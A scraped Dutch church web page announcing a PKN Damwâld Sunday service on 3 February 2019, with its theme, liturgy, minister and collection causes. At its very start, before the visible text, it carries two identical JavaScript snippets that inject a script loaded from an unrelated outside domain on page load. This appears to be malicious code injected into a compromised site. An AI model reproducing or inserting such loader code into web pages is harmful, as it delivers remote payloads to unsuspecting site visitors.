;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 3 februari 2019 9:30 uur - PKN Damwâld
zondag 3 februari 2019
09:30 uur
Koffie na de dienst

Kerkdienst zondag 3 februari 2019 9:30 uur

Thema: "Keuzevrijheid"

Informatie

Voorganger:Ds. G.J. Timmer, Twijzelerheide & Burdaad
Organist:Ivo van Hijum
Thema:"Keuzevrijheid"
Mededeling:Koffie na de dienst
Liturgie
Lied voor de dienst Elb 235 : 1, 2 en 3
Binnenkomst kerkenraad en voorganger
Intochtslied Gez. 1 : 1, 2, 3 en 4
Stil gebed, bemoediging en groet
We zingen: Psalm 19: 1 en 2
Wetlezing .
We zingen: Psalm 19: 4 en 5
Gebed om de opening van het Woord
We lezen uit de Bijbel : Jeremia 1: 4-10 en Lukas 4: 14-22
We zingen: Gezang 325: 1, 2, 3, 4, 5, 6 en 7
Verkondiging “Keuzevrijheid”
We zingen: Psalm 139: 9, 10 en 11
Dankgebed en voorbeden
Collecte
Slotlied : ELB 178: 1, 2, 3 en 4 + refrein
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Stichting Ontmoeting

Vastgelopen mensen worden door de stichting Ontmoeting ondersteund om hun leven weer op orde te krijgen. Stichting Ontmoeting leert hen weer op eigen benen te staan, relaties aan te gaan en te onderhouden en de juiste keuzes te maken. Zo krijgen deze mensen weer perspectief in hun leven. Dankzij vrijwilligers en medewerkers kunnen we deze missie uitvoeren. Ze zetten zich met hart en ziel in voor hun medemens. Door een luisterend oor of praktische begeleiding te bieden. Of door ondersteunende taken te verrichten.

Tweede collecte: Kerk
Uitganscollecte: Werelddiaconaat

Help Bangladesh in de strijd tegen het water:
Ieder jaar treden in Bangladesh tijdens de moesson de rivieren buiten hun oevers. Dat zorgt voor vruchtbaar land. Maar de overstromingen, die door de klimaatverandering talrijker en heftiger worden, zijn ook een ramp voor de inwoners. Partners van Kerk in Actie helpen de mensen beter voorbereid te zijn op overstromingen zodat de gevolgen beperkt blijven.